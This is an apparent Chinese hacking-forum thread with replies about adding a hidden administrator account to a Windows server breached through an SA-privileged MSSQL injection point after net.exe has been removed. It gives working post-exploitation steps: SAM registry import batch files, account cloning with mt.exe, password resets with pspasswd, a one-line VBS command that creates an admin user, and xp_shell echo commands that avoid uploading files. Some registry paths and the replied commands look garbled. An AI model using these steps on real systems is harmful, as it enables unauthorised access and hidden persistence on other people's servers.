题目：实现无net.exe和net1.exe添加系统用户
文章作者：hackest[H.S.T]

此文章首发作者博客，后由作者友情提交到邪恶八进制论坛

大家都知道在windows下添加用户可以在CMD下用net命令来实现
格式为:net user username password /add
意思为添加一个用户名为username密码为password的用户
如果要添加进管理员组还可以用如下命令来实现
net localgroup administrators username /add
这样就把用户名为username的用户加进了管理员组

但是如果不用net.exe和net1.exe是不是就无法添加系统用户了呢？
答案是否定的！

假设我们现在手上有一个SA权限的MSSQL注入点
3389开放并允许连接登录
可以通过注入工具执行任意命令
但是管理员把net.exe和net1.exe改名或者直接删除掉了
当然这样是可以通过上传自己的net.exe和net1.exe再执行添加用户命令
但是为了说明这种方法，我们不采用上传net.exe和net1.exe的方法来解决！

首先要做的就是本地新建一个用户
比如在本地添加一个用户名为hackest的用户
然后导出如下注册表内容：
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\hackest
保存为hackest.reg

再导出注册表内容：
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\下与hackest相对应的键值
比如是000003F6
就导出：
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\000003F6
保存为000003F6.reg

然后再写一个批处理文件，名为add.bat
add.bat文件内容如下：

regedit /s hackest.reg
regedit /s 000003F6.reg
del hackest.reg
del 000003F6.reg
del add.bat

把这三个文件：hackest.reg、000003F6.reg、add.bat传到目标服务器上
运行add.bat文件

上传mt.exe运行mt -chkuser命令
我们会发现已经成功添加了一个用户名为hackest的用户
但是它并不属于任何成员组
所以得把它克隆成管理员
假设管理员用户为administrator，则命令为：
mt -clone administrator hackest
成功克隆为管理员后是不是就可以登录3389了呢？
其实现在还不可以的
因为这个用户的密码问题还没有解决

我们可以用PS系列工具中的pspasswd.exe来解决密码问题
命令格式为：
pspasswd.exe username newpassword
在此例中命令则为：
pspasswd.exe hackest hackest
这样就把用户名为hackest的用户密码更改为hackest了
现在你可以放心地去连接登录3389了，呵呵

其实完全可以通过上传net.exe或net1.exe再执行添加用户的操作来达到目的
不过在这里只是为大家提供一个完全可以不用那两个文件一样能添加用户的思路！

pt007写的一个clone.exe
执行clone.exe -c 1F5
然后pspasswd.exe guest newpassword
不用reg和bat了。

echo dim username,password:If Wscript.Arguments.Count > 0 Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="fulldream":password="95277":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"^&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os^&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os^&"/"^&username^&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath >cz.vbs
cscript cz.vbs
del cz.vbs

vbs添加一个fulldream密码95277的用户。

无需net.exe net1.exe 无须上传文件。

上传这么多工具还不如上传个免杀的马之类的

脱裤子放屁－－多此一举，　还用那么废事，有SA权限　可以执行任意命令，不如楼上所说的：

引用:

引用第3楼sznicko于2007-10-24 08:33发表的 :
上传这么多工具还不如上传个免杀的马之类的

　就完了　传那么多工具的时间　都够干别的事了

楼上的看文章不动脑子
楼主也说过
其实完全可以通过上传net.exe或net1.exe再执行添加用户的操作来达到目的
不过在这里只是为大家提供一个完全可以不用那两个文件一样能添加用户的思路！

知道什么叫思路不...
就好比我今天遇到一个SA,弱密码
连接上只能执行部分命令net net1都没..传也传不上去
楼主的这个办法我正好可以试下.

看出“新手上路”为什么叫“新手上路”了。

希望某些人能够谦虚一些。尤其是一些本身知识就少得可怜的。

这个是不是和 修改注册表创建隐藏帐户的方法 一样啊

貌似这个方法很早就有人提出来了
黑防2006年的文章 第几期忘记了

另外用 NetUserXXX系列函数就能实现用户的添加和删除,还有密码修改等等

主要的函数是 NetUserAdd  自己google 和 MSDN  

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;code by asm http://www.asm32.cn/
;2007-9-29
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  .386
  .model flat, stdcall
  option casemap :none  ; case sensitive
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;  Include 数据
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  include    windows.inc
  include    user32.inc
  include    kernel32.inc
  include    Netapi32.inc
  
  includelib  user32.lib
  includelib  kernel32.lib
  includelib  Netapi32.lib

.data?
oUserInfo USER_INFO_1<?>
oUser LOCALGROUP_MEMBERS_INFO_3 <?>
dwErr DWORD ?
.data
szUser dw "a","s","m",0
szPass dw "p","a","s","s",0
szAdministrators dw "A","d","m","i","n","i","s","t","r","a","t","o","r","s",0
.code

asm的代码没发完整吧

我草,被人改了

传不了东西的话呢???

上传那么多东西！~为什么要如此烦琐的操作呢？

    看了 开始还懂，用修改注册表的方法，利用批处理添加进去用户
到了mt命令的时候，就不懂了，到网上查了这个工具，下载下来，简单的使用了下，
知道了它的 命令，文中的 mt -chkuser   指的列出所有账户、sid 和 anti 克隆
mt -clone  是克隆 admin 到目标  
我还看到一条命令 就是用 -never   这个来设置账户看上去从未登录，是不是可以呢
如果只是克隆的话，如果对方知道这个方法查到，也会删除，用这个命令的话就可以迷惑他了
至于不用net命令，而我对password.exe这个命令也不熟悉
查了下，知道 是更改本地或远程系统口令命令行工具
具体用法还没有找到，还望指教，是不是只有
pspasswd.exe username newpassword
这一个语法呢？？

其实完全可以通过上传net.exe或net1.exe再执行添加用户的操作来达到目的
不过在这里只是为大家提供一个完全可以不用那两个文件一样能添加用户的思路.
确实。我还是感觉直接上传net1.exe来的直接。
感觉这个和突破NTML验证有点相似/

思路好。。拿注册表什么都可以导了。。。。

把这三个文件：hackest.reg、000003F6.reg、add.bat传到目标服务器上
运行add.bat文件

导出注册表和导入注册表，这些分别是起什么作用的啊？

呃 的确学到了很多
上传入侵 也是SA权限 3389可以连上去
得到shell以后 就是不能加用户

说是输入超出了文件尾
实在郁闷 可能是删除了 net.exe吧
那个vbs加用户的代码 回去好好看看

引用:

引用第5楼fhod于2007-10-25 16:11发表的 :
楼上的看文章不动脑子
楼主也说过
其实完全可以通过上传net.exe或net1.exe再执行添加用户的操作来达到目的
不过在这里只是为大家提供一个完全可以不用那两个文件一样能添加用户的思路！

.......

仔细看楼主的文章,到后面还是得通过上传工具实现.
与其传其他文件
不如直接传net.exe上去直接加
这不跟脱裤放P一样么

可以直接添加用户的时候就把密码加上，就不需要ps的工具来设置密码

直接用户密码连接就可以了

传个 ghost 再传个 镜像 上去 嘿嘿

确实比较实用的
上一个net1有的时候不能执行全部的命令
我在EST里看到过这个文章
并且利用其成功的拿到了权限
感谢楼主中^

引用:

引用第0楼hackest于2007-10-22 15:49发表的 [原创]实现无net.exe和net1.exe添加系统用户 :

题目：实现无net.exe和net1.exe添加系统用户
文章作者：hackest[H.S.T]

引用:

引用第10楼zshoucheng于2007-07-03 19:28发表的 :

懒得说了.现在我也觉得有些人你不懂就别瞎搀和
在邪8你看贴不回没人说你的

之前某些機緣之下，結識「冰血封情」站長，使小弟註冊成為貴站的會員，有幸見識到貴站高手雲集，使得我因怕觀念錯太大，而不敢隨意發表，現在我是冒著可能獲得上面那位高手如此批判的危險來回覆此篇文章。

引用:

假設我們現在手上有一個SA權限的MSSQL注入點
3389開放並允許連接登錄
可以通過注入工具執行任意命令
但是管理員把net.exe和net1.exe改名或者直接刪除掉了
當然這樣是可以通過上傳自己的net.exe和net1.exe再執行添加用戶命令
但是為了說明這種方法，我們不採用上傳net.exe和net1.exe的方法來解決！

考慮到設管理員禁用除本身以外的用戶使用 net.exe 與 net1.exe 該二文件，我們必須想其他的方法 Clone 新用戶，這裡樓主提到「不上傳」net.exe 與 met1.exe 來解決 Clone 用戶所碰到的問題，但是我認為重點在於「不上傳」任何文件。

這邊又提到可以注入點使 MSSQLD 透過 xp_shell 執行指令，意思就是我可以透過擁有 SA Privilege 的 MSSQLD 執行任何在他權限內所能達成的指令，也就是我可以在 Daemon 能涉及的 Volumes 內作任意讀寫，所以透過批次處理，我認為根本就不需要上傳任何檔案，以下我照樓主原本的文件內容 作一次無須上傳任何文件的 Demonstrate：

复制内容到剪贴板

代码:

xp_shell echo Windows Registry Editor Version 5.00 > useradd.reg
xp_shell echo [HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\ ]>> useradd.reg
xp_shell echo [HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\hacktest] >> useradd.reg
xp_shell echo @="000003F6" >> useradd.reg
xp_shell echo regedit /s useradd.reg > useradd.bat
xp_shell echo del hackest.reg >> useradd.bat
xp_shell echo cmd /q /c useradd.reg
xp_shell echo del useradd.reg
xp_shell echo del useradd.bat

引用:

把這三個文件：hackest.reg、000003F6.reg、add.bat傳到目標服務器上
運行add.bat文件

雖然上列方法看似較樓主原來的麻煩，但是也真正 Implement 「無上傳」任何檔案 Clone 系統用戶的方式，此方法更適合用在對方沒有執行任何 FTPD 或者禁止管理員本身執行FTP.exe 的時候！

我只能telnet上机器
下一步就开始学习怎么用注册表创建隐藏帐户了